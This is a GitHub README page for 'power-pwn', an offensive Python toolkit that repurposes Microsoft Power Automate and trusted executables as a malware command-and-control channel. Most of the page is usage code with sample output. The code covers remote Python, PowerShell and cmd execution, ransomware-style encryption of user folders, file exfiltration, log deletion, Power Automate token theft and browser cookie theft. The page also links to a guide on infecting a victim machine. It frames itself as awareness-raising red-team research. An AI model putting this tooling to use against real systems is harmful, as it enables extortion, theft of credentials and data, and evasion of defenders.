8000 GitHub - ikpehlivan/power-pwn: A demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
/ power-pwn Public
forked from mbrg/power-pwn

A demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation

License

MIT license
1 star 99 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

ikpehlivan/power-pwn

BranchesTags
 
 

Repository files navigation

Power Pwn

stars twitter email me

Power Pwn is a demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.

Power Pwn

Disclaimer: these materials are presented from an attacker’s perspective with the goal of raising awareness to the risks of underestimating the security impact of No Code/Low Code. No Code/Low Code is awesome.

Usage

from powerpwn.c2 import PowerPwnC2

POST_URL = ""
pp = PowerPwnC2(post_url=POST_URL)

### code execution

# python2
pp.exec_py2("print('hello world')").cmd_code_execution
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')

# python2 bad syntax
pp.exec_py2("bad syntax").cmd_code_execution
# CodeExecOutputs(ScriptOutput='', ScriptError='  File "", line 1\r\n    bad syntax\r\n        ^\r\nSyntaxError: unexpected token \'syntax\'')

# powershell
pp.exec_ps("Write-Host \"hello word\"").cmd_code_execution

# commandline
pp.exec_cmd("echo \"hello word\"").cmd_code_execution
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')

### ransomware

pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").cmd_ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')

### exfiltration

pp.exfil(target="C:\\Users\\alexg\\Downloads\\takeit.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=True, FileContents='asd')
pp.exfil(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=False, FileContents='')

### cleanup

pp.cleanup().cmd_cleanup
# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)

### steal_power_automate_token

pp.steal_power_automate_token().cmd_steal_power_automate_token
# StealPowerAutomateTokenOutputs(Token='ey...')

### steal_cookie
pp.steal_cookie("https://www.google.com").cmd_steal_cookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')

How To

How to set up your Power Pwn cloud environment

How to infect a victim machine

How to troubleshoot execution errors

About

A demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%
0